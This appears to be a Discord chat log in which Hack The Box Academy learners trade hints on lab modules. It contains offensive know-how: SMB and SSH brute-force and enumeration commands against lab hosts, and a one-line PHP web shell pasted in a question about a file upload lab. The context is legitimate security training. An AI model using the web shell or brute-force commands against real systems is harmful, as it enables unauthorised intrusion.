otherwise just try looking at the traffic

rustic sage
#

hey - im currently doing the zap scanner question in the 'using web proxies' module but i cant seem to figure it out. i found the vuln path traversal on the comment page, how do i use this to find the directory containing the '/flag.txt'

high sentinel
#

what about smblient -U 'random%asdf' -L //1.2.3.4?

#

afaik there are two types of smb authentication when it comes to smb without creds. I'm not sure about the correct naming, i think one of them is called anonymous and you don't need any username for that, for the other one you can just use any name/password iirc or maybe just any name without password (ie smbclient -U 'random' -N //..)

#

well, isn't it possible that you can get any data off the smb first to possibly get working creds for it to access another share or so?

#

i'm not sure you're getting what i said but i may be wrong about that, i haven't done any of the academy stuff. If you can do anon auth to smb, you can list shares and possibly access some of them. If there was like a share username which would require a specific password/username combination you would need to bruteforce that to access it. There could possibly be a wordlist accessible anonymously on another share or so.

#

any idea about the OS of the box?

#

try using -d domain, --local-auth or just using box_name\username with cme

#

if ssh doesn't suppor password based auth there's no point in trying to connect using username/password, there's likely gonna be a flag or ssh key on the smb

#

anyway if that doesn't help or if you were to solve this on your own, it's a good idea to do deeper - ie looking at the traffic and figuring out what the issue is. That works everytime 60 % of the time 😄

thorn urchin
#

worth checking with intentionally bogus creds for anon access

#

people forget about it cause they confuse it with guest and null share access, but its own thing

high sentinel
#

hmm? so the anon auth works? (should be working in this specific academy module?)

high sentinel
thorn urchin
#

theres a couple of modules/segments that have anon auth

#

which module and section is this again?

#

ah yeah, I have zero notes for some reason on that one

fathom pendant
#

F

rustic sage
#

Did you brute force smb?

#

Show me the command you used

rustic sage
#

Hmm so you are getting false positives?

#

Give me an example of a false positive

#

Have you tried resetting the ip

#

Have you tried using msfconsole smb login scanner

versed frost
#

hey, I read in the practice section of cpts that at the end of each module, there will be number of suggested retired machines, I tried to find them but I could not, can anyone help?

rustic sage
#

Try to slowdown the threads and speed that crackmapexec or msfconsole are scanning at

broken swift
#

Hi, hello

rustic sage
#

Whats the very first false positive you receive when running the scan

#

How about trying that with smbclient to enumshares 😄

#

Or crackmapexec

broken swift
#

Any rust programmer around?

rustic sage
#

Show me the command you used for that

#

Smbclient -U admin ////ip//share

#

Use crackmapexec to enum shares

#

You have the right credentials, admin:123456

#

What is the sharedrive you found

#

Okay and what happens when you use the command I posted for smbclient

#

It shouldnt ask for root pass

#

Are you putting -U admin

#

👍

#

And you put: 123456

#

As the password

#

Hmm, Im unsure.

#

Smbclient -U admin ////ip//SHAREDRIVE

#

Im unsure of how to help then, because that worked for me

#

Goodluck 👍

#

You are on Password Attacks - Medium Skills Assessment?

#

I’m unsure what to tell you I hope you can figure it out 👍

#

Np nice 👍

high totem
#

Question about Password Attacks easy lab - is the goal to just try to remote crack root's pass to ssh using crackmapexec/hydra and some wordlist (rockyou or the mutated one from resources)? Because there isn't much more in the task, but seems kinda... boring? dumb? I would think I am missing something normally, but with this module I am not sure anymore :/

rustic sage
latent meteor
#

Is anyone stuck on the footprinting hard lab? Trying to bruteforce the snmp community (worthless with the seclists for snmp community lists) and rockyou..either kills the machine or false positives…what’s is usually the strategy you guys follow on selecting a wordlist for these guys and why the hell the lab is again focused on getting one specific list -.-‘ not really sure how this helps getting the concepts

high totem
#

Just started this lab

rustic sage
rustic sage
brazen saffron
#

I am in the section "Public Exploits" in Getting Started but I can not be connected to the server, I am with the VPN btw.

rustic sage
high totem
rustic sage
high totem
shrewd stirrup
#

Hi, is there anyone who can help me? I think that sequel is not working in TIER 1

fathom pendant
rustic sage
fathom pendant
#

Bruteforcing ssh is not a fun thing

high totem
high totem
rustic sage
#

Password Attacks Module don’t forget

high totem
pliant flame
#

hi guys. I could use a hint at Question 2 in Footprinting IMAP / POP3
What is the FQDN that the IMAP and POP3 servers are assigned to?
I ve enumerated with nmap, connected to the POP3 and IMAP servers vie openssl, and even tried to use dig ns inlanefreight... in desparation
neither the ...inlanefreight.htb nor the ...inlanefreight.htb seem to be the FQDN assigned to IMAP and POP3

mabye a kind soul could nudge me in the right direction. 🙃

fathom pendant
#

Why would dev or ns be used for a mail server fqdn; also read the connection closely when you connect to it iirc it tells you

pliant flame
#

no matter what i do the only thing i get is the dev adress when i connect to the imap and pop3 server. nowhere else an adress is shown

fathom pendant
#

Are you keeping the trailing . in your copy/paste

#

If so, that's why

#

Also delete that screenshot, spoilers

pliant flame
#

thanks for your help. I dont know what my problem was. Now it worked though. I could ve sworn i copy pasted the same thing 3 times already into the answer box.

vital bough
#

can anyone tell me why my reverse shell php isn't working on the very first File Upload Attacks module?

#

I keep getting the failed to "dameonize error" and <?php system($_REQUEST['cmd']); ?> doesn't work either

#

I'm using tun0 and it doesn't seem to be doing anything...

latent meteor
#

You gave my that great hint to focus on that service (i was as well trying to bruteforce ssh and imap)

latent meteor
quiet night
#

Are there any plans to add more defensive/blue team modules/skill paths/job paths to Academy? I'm loving the current modules but it's very offensive centric and I'm hoping for some defensive stuff in the future

high sentinel
#

no clue about that. You could possibly try thinking about securing the stuff after you pwn it from the defenders perspective if that makes sense

fathom pendant
quiet night
high sentinel
#

well if you're interested in the forensics (i'm guessing some soc like stuff) there's probably not much such content on htb

graceful rampart
quiet night
#

Yeah THM's recent expansion into defensive content is what made me think about it

graceful rampart
#

I doubt HTB is gonna go the same route

quiet night
#

Yeah I get that, if they ever do add more blue team stuff I think it would mesh really well with Academy's module style

graceful rampart
#

It could, but like I said earlier, HTB has and likely always will be primarily focused on offensive security. You get get tidbits of mitigation and detection at the end of some modules but thats likely the most you'll ever see

rustic sage
#

how do i get the number of zones a domain has?

high sentinel
#

no clue what exactly do you mean by that question

quiet night
high sentinel
#

dig @server ANY domain?

rustic sage
latent meteor
fathom pendant
#

The module/section tells you exactly what to do

rustic sage
#

I get:

└──╼ [★]$ nslookup ns.inlanefreight.htb 10.129.203.205
Server:        10.129.203.205
Address:    10.129.203.205#53

Name:    ns.inlanefreight.htb
Address: 127.0.0.1
rustic sage
#

and the subdomains

rustic sage
#

Active Subdomain Enumeration

fathom pendant
#

to make it a link add http:// in front so i don't have to copy paste

buoyant escarp
#

i cant spawn the machine for a week now, NOSQLI assessment 1 wont work for me, but assessment 2 does...
thats so weird

high sentinel
#

can't spawn?

#

404 doesn't mean that the box is not running, i'd say it's exactly the opposite

buoyant escarp
#

well thats a point

fathom pendant
#

but the info should be there... I'm busy atm; so maybe someone else can nudge

high sentinel
#

all the info should be in the transfer

rustic sage
#

hmm

high sentinel
#

iirc

rustic sage
#

let me read through it one more time

fathom pendant
#

^

royal glade
#

Module Using Web Proxies. Page 8 / Encoding/Decoding. How to solve:

The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag.
high sentinel
fathom pendant
#

it kinda tells you what to do

royal glade
high sentinel
fathom pendant
#

It's not letting you paste as it's detecting it as spam

rustic sage
#

this stupid MEE6 bot tells me that I can't send the same message over and over again even though its not the same

high sentinel
#

😄

rustic sage
fathom pendant
#

Yeah that happens when copying code blocks

high sentinel
#

possibly just paste the important part only?

rustic sage
#

i did

fathom pendant
#

it's a mee6 being dumb thing

#

not uncommon

high sentinel
#

👀

raven cairn
#

Has anybody had any issues with breaking into slack by extracting the cookie? (WIndows Priv Esc -- Pillaging)

royal glade
fathom pendant
#

looks like it is a base64

#

so

#

¯_(ツ)_/¯

royal glade
#

Yeah

high sentinel
fathom pendant
#

hint says to use url-encoding probably to get the end result

royal glade
fathom pendant
#

not as a jumping off point

raven cairn
high sentinel
#

i could try to help but haven't done it

fathom pendant
royal glade
#

This is raw out from base64 Decoding:

U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2uS'…5V³Tf4eeudT¤Åfµ¤tådç5V×F…e„%edf‡u3 ¤v4„åF$d¦ ¥wGuee%•¤WEu&×C5S'…5FÕdf4ee†%†„ÅfµWvUdç5VÆF•e„%ec# E3 ¤dÕE%F$d¦…–µguefGF WEu%D#5S'…6 $c5 C Ò ØL‘ŒÔ  D0=

What Encoding probably is it?

raven cairn
#

gimme a sec

#

@high sentinel Figured it out haha

#

Thanks for trying to help

high sentinel
high sentinel
raven cairn
#

Lol

fathom pendant
#

hey lager quick related question

high sentinel
#

yeah, sure 😄

royal glade
# high sentinel <@436941244602777602> 1. put the contents into the file 2. base64 decode it 3. ...

Content is given to me as a zip file. It is base64 encoded string in there after unpacking. And after base64 Decoding I've got this

U2xSUk5FcFVWVEJLVkZGNVNsUmthVXBVVFhwS1ZGcHNTbFJaZWtwVVRYZEtWRmt3U2xSTmVFcFVXbXhLVkUweVNsUldiVXBVV214S1ZFMTRTbFJhYkVwVVdtaEtWRTB3U2uS'…5V³Tf4eeudT¤Åfµ¤tådç5V×F…e„%edf‡u3 ¤v4„åF$d¦ ¥wGuee%•¤WEu&×C5S'…5FÕdf4ee†%†„ÅfµWvUdç5VÆF•e„%ec# E3 ¤dÕE%F$d¦…–µguefGF WEu%D#5S'…6 $c5 C Ò ØL‘ŒÔ  D0=

And I do not know what is this

fathom pendant
#

does == denote base 16?

fathom pendant
high sentinel
#

not that i'm aware of, like base16 encoding or what do you mean specifically? base16 => hex?

fathom pendant
royal glade
high sentinel
fathom pendant
#

cause i'm curious and doing this while standing

fathom pendant
#

using the built in base64 -d command

high sentinel
fathom pendant
#

ag

#

i see

high sentinel
royal glade
fathom pendant
#

lol

#

that's why i was sanity checking using a different decoder

#

two things - is the burp decoder setting as UTF-8 and b64?

high sentinel
#

i'd say burp decoder sucks, i never personally use it for anything

#

but just my opinion

fathom pendant
#

sanity checking launching burp on mine

royal glade
fathom pendant
#

figure sanity checking lets me at least gets me a headstart in the future :D

fathom pendant
#

are you throwing a hash in there? that may output the junk

royal glade
fathom pendant
#

under decoder tab I just used decode as:

royal glade
#

Yeap

#

To base64

fathom pendant
#

are you using a file or the raw text

royal glade
#

And burp gives me smth weird, not the same string that throws for example cyberchef

royal glade
fathom pendant
#

dm me it

#

and if there are any options you may have changed

fathom pendant
#

cause it looks like the results you got are generally if you use one of the hash options

royal glade
#

Nope

#

I didn't even touch hashes

fathom pendant
#

hmm

royal glade
#

Just decode as base64

fathom pendant
#

weird

candid olive
#

where do i get this word list for gobuster /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt ?

fathom pendant
#

...

#

SecList

candid olive
#

but from aot it amass and i dont find the right subdomain

#

apt*

high sentinel
#

use the bigger list then?

#

20k list?

candid olive
#

tried all of them

#

evem from other worlists

fathom pendant
#

what is the module that you are doing?

candid olive
#

n

#

starting point

#

three

fathom pendant
#

link?

candid olive
#

the walktrough ask me to use this path /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt but this path does not exsit in my vm

#

page 4

fathom pendant
#

did you install seclists on your machine?

candid olive
#

yes

fathom pendant
#

then change the path to whatever the seclist path is on your system

candid olive
#

it shown as amass

high sentinel
#

what command are you using?

fathom pendant
#

~/SecLists/Discovery/DNS/ if it's just downloaded to your home directory

candid olive
#

gobuster Vhost

high sentinel
#

exactly? 😄

candid olive
#

Marcielee u was right

#

but whats the diffrent between each worldlist

#

if i attack for real so i have to check every single world lists ?

fathom pendant
#

each wordlist has different words and different permutations of words

#

if you ls -la in that wordlist directory - you will see different filesizes

#

the top is just the most common ones

#

and contains however many words it says in it

#

depending on the wordlist you use it can take a while to finish

candid olive
#

i still failed to find the subdomain

fathom pendant
#

some wordlists contain the same words as another;

candid olive
#

s3.thetoppers.htb Status: 404

#

it found it but in 404 code why ?

fathom pendant
#

i see nothing wrong

#

it means page not found; not necessarily that it doesn't exist

candid olive
#

ohhh

#

so other word list showed me alot of 404

#

ok i need to learn more

fathom pendant
#

Sometimes a 404 code just means it can't be automated

#

to be found

#

you'll learn a lot that sometimes you have to manually check the answers given by automated tools

cobalt trench
#

Hey everyone, I'm on module 2 Web Enumertion and I am stuck. It says to use the Enumeration techniques shown to get the login credentials but I don't see any section to "Login". Is anybody available to give me a quick hand?

candid olive
#

thank marcielee

cobalt trench
high sentinel
#

just type in that command

#

and tell me what output you get

royal glade
#

So, I restart the burp and it works now

cobalt trench
fathom pendant
#

@cobalt trench replace "ip" with the IP of the target system

high sentinel
#

and possibly add a port to that

royal glade
fathom pendant
cobalt trench
royal glade
fathom pendant
#

dude

#

if you get another b64...

royal glade
#

Yeah

fathom pendant
#

what is the next logical step

cobalt trench
#

no login credentials or flag that i can notice

high sentinel
royal glade
high sentinel
#

something like <form>?

royal glade
fathom pendant
#

yep

royal glade
#

I don't know what Encoding is it

#

And it seems it is nothing from burp encodings

fathom pendant
#

reminder: what's the original question

cobalt trench
cobalt trench
#

curl -v didnt show <form>

royal glade
#

Oh, I figured it out

#

@fathom pendant thanks for your tips

fathom pendant
#

Recursion:
see the definition of recursion

#

also delete this as it can be seen as a spoiler

high sentinel
fathom pendant
#

afk

cobalt trench
high sentinel
#

np 🙂

hardy gyro
#

Hi, I'm trying to find people to setup a discord call to work on some HTB machines/challenges, Id say I'm ~intermediate but all are welcome. Feel free to PM me if you're interested. Thanks!

hazy grotto
#

Has anyone updated to windows 11? anyone recommend?

hardy gyro
#

I'm running windows 11 atm @hazy grotto, I haven't had any issues with Vbox/HTB.

cobalt trench
thorn urchin
#

verify your account in #welcome and post in a more relevant channel

rustic sage
#

anyone know how to fuzz fqdn. for example i want to scan inlanefreight.local for blog.inlanefreight.local or similar example

#

here is what i tried but it didn't work ffuf -u W1.inlanefreight.local -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:W1 -t 500

#

I am trying to do the system information section of the linux fundamentals module. When I try to ssh into the target it says permission denied. I'm using the vpn but it did the same thing when i tried the workstaion in the web

#

sent u a dm @rustic sage

high sentinel
rustic sage
#

entering the password
turns out i accidentally missed the exclamation mark at the end

karmic mantle
rustic sage
#

Thanks a lot man!

wanton oriole
#

Hi all, could anyone share a hint for the starting point Meow that how can I get the root flag? thx!

wanton oriole
fathom pendant
hazy grotto
#

What does a baby computer call his father?

#

Da ta

pliant sage
#

yo, does anyone know why the following query returns an error? select COUNT ( * ) from (select * from employees union select dept_no,dept_name,3,4,5,6 from departments);

#

the query between parenthesis works fine, but for some reason when i try to count the output number of rows it doesn't work

#

How do I use it on the final result of the query? Could you provide an example command please?

brisk geode
pliant sage
#

doesn't work 😦

#

anyway it's okay, the query in itself returns the number of rows at the bottom of the table so it works out

#

yeah emp_no for example

#

but they do, that's why i run junk data in the second select query with 3,4,5,6

#

asi said the union query works fine, it's just when I try to pair it with the count that something fails

rustic sage
#

hey can you guide me on this?

shrewd mural
#

I use firfox & burp to intercept the request, and I sometimes I found the post request from firefox doesn't go to burp. i.e., in module/134/section/1219 & /settings.php when I want to change the password of a user. Does anyone got the same issue like me?

stone zenith
#

Should I be able to accomplish priveesc to user2, and root, without uploading any scripts to the machine and solely with the information on academy about privilege escalation? I can’t transfer files because the IP addressing for this module is different

dim hound
stone zenith
#

I’ve completed everything else in the module except this part

dim hound
#

I will check mine notes

#

There are 2 priv esc sub-modules XD, which one are you doing exactly?

stone zenith
#

In the module getting started, in the penetration testing path, there is a section called priv esc, you are given ssh credentials to ssh into the server, elevate to user2 and then root, but the ip addressing isn’t a 10.10. type address it’s 165.227.231.xx so I can’t upload any scripts to it

dim hound
#

hmm, have you tried to ping from Target -> Attacker machine? I was able to upload files.

stone zenith
#

I’ve been able to upload files with all of the vpn connected machines

stone zenith
# thorn urchin scp

I’ll try that thanks, I’m guessing any reverse shells won’t work due to the different ip addressing for this section

thorn urchin
#

they can, but requires more setup from you to make sure any nat/firewall is port forwarding properly.

tender jolt
#

Hi, i just joined Hackthebox, and I'm looking to improve my computer forensic skills.

Is there a way to filer for boxes that require forensic analysis ?

rustic sage
tender jolt
stone zenith
thorn urchin
#

no, scp works just fine

stone zenith
# thorn urchin no, scp works just fine

I ment for reverse shells. Or maybe I don’t need a reverse shell. It’s just that all the other machines connect through the vpn interface but this one is an ip like 165.227.231.233:32055 to ssh in to

thorn urchin
#

you wont need a reverse shell for any of the public ip docker machines

thorn urchin
#

you could still set one up if you really wanted to, but itd be extra work not expected by the module.

stone zenith
thorn urchin
#

you prob can, I dont remember

#

you rarely have to use priv esc scripts, they just automate a bunch of manual escalation checks

rustic sage
foggy kernel
#

Hello

#

Im having an issue when i want to download a script from my webserver on the victim

Privilege Escalation section

tender jolt
#

oh, so u need to first to some easy machines, before u can see more ?
neverthought about doing network intro (i got a CCNA) but i guess il have to unlock stuff

latent meteor
thin sequoia
#

hey i need help with this question : What is the path to the htb-student's mail?

fathom pendant
#

Module? Have you exhausted and double checked what the module has told you so far

strange aspen
#

hi guys im at footprinting module and i try to make a mssql query but the impackets mssqlclient.py doesnt work. im trying the sql powershell module at the moment but im not able to connect due to a lack of powershell knowledge can someone help me pls?

buoyant drum
#

Hi, I need help with Password Attacks Lab - Hard where we mount the BL file. I tried mounting it with cryptsetup method but it didn't show up on my Linux machine. Maybe I'm doing wrong. Can someone help me or point me to any article?

graceful rampart
strange aspen
#

| Incorrect syntax was encountered while parsing ''.

#

Invoke-Sqlcmd: Login failed for user 'backdoor'.

#

Invoke-Sqlcmd -ServerInstance "10.129.201.248" -Credential (Get-Credential) -Query "SELECT name FROM sys.databases"

graceful rampart
strange aspen
#

| Incorrect syntax was encountered while parsing ''.
[16:51]
Invoke-Sqlcmd: Login failed for user 'backdoor'.

graceful rampart
#

You're not reading my messages

#

If you can't read I can't help you

graceful rampart
buoyant drum
#

that's what I was thinking Let me give it a try.

graceful rampart
#

I know you can mount it on Linux. But I didn't bother trying to figure it out

graceful rampart
#

My logic is ill always be able to boot up a windows vm

#

So why bother figuring iut how to mount it on linux

buoyant drum
#

You are like: I want no trouble mister. xD Thanks

graceful rampart
#

Np

strange aspen
#

im trying with impacket mssqlclient.py again: ModuleNotFoundError: No module named 'impacket.examples.utils' can someone tell me what to do?

rustic sage
#

Guys for the file inclusion module Skills Assesment I just cant get the ||l** p* ||to work, i found the min/index.php page which u lfi, but i just cant turn it into rce
[SOLVED]: i did the ||l
P*|| method as shown in the section of the module, after a couple restarts of the box it worked :)

barren dirge
#

Heya! I might be just really really silly and naive, but in the Footprinting module, in the SMB section. I have everything else done from it but he second to last question stands: " Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer. " . Now I have used ||rpcclient|| and its ||netsharegetinfo|| to obtain more information from the share and I can't for the life of mine to figure out what is the input the question is after :D

barren dirge
#

Its not the netname, its not the C:.*, its not the //srvname/share or \srvname\share or what ever combination I can come up with that would be a valid answer for that in my head

#

Host Based Enumeration -> SMB

dim hound
#

hmm I will have to review mine notes. Maybe Enum4liux can help

barren dirge
#

I'll give it a nudge.

sweet goblet
#

Hey!
I'm doing the easy footprinting lab, and its really bothering me that i was not able to do it w/o the hint.
Could you guys please tell me how to find the username + pw?

dim hound
#

I just checked mine notes, you should be able to find it

barren dirge
dim hound
#

If you aren't able to find it, feel free to dm me @barren dirge

sharp temple
#

Hello everyone, i just want to ask what is the right path to catch the domain controller, if I have a user that is admin to computer and this computer is admined also byt domain admins group and of course the administrator is member of domain admins ... I cannot find this in modules, can somebody help me?

mellow turtle
sharp temple
mellow turtle
#

dm me

graceful rampart
sharp temple
mellow turtle
#

i think he is trying to say that domain admins are members of administrator group of the local machine

graceful rampart
#

I get what hes saying

#

Unfortunately tho afaik that means nothing.

#

I dont believe theres a way to exploit that

#

Having local admin on an AD machine is very useful because you can get system access in a variety of ways and as system you can do a lot of things. But a domain group having local admin access to a specific machine dosent mean anything unless you can come to control and account within the group

#

And in this case, if you control an account within the domaina admins group theres no reason to be having this conversation

mellow turtle
#

He control just a local admin

#

he can run lazagne, rubeus, mimikatz,Inveigh etc

#

to try to scale

graceful rampart
#

Yes and what im saying is that has zero relation tot he domain admins group

graceful rampart
mellow turtle
#

btw u know why this happens?

graceful rampart
#

But his querstion was if he could abuse the fact that domain admins have local admin access to the machine. The answer is no

mellow turtle
#

im having a segmentation fault error when running nmap with -sV -sC flags

mellow turtle
#

f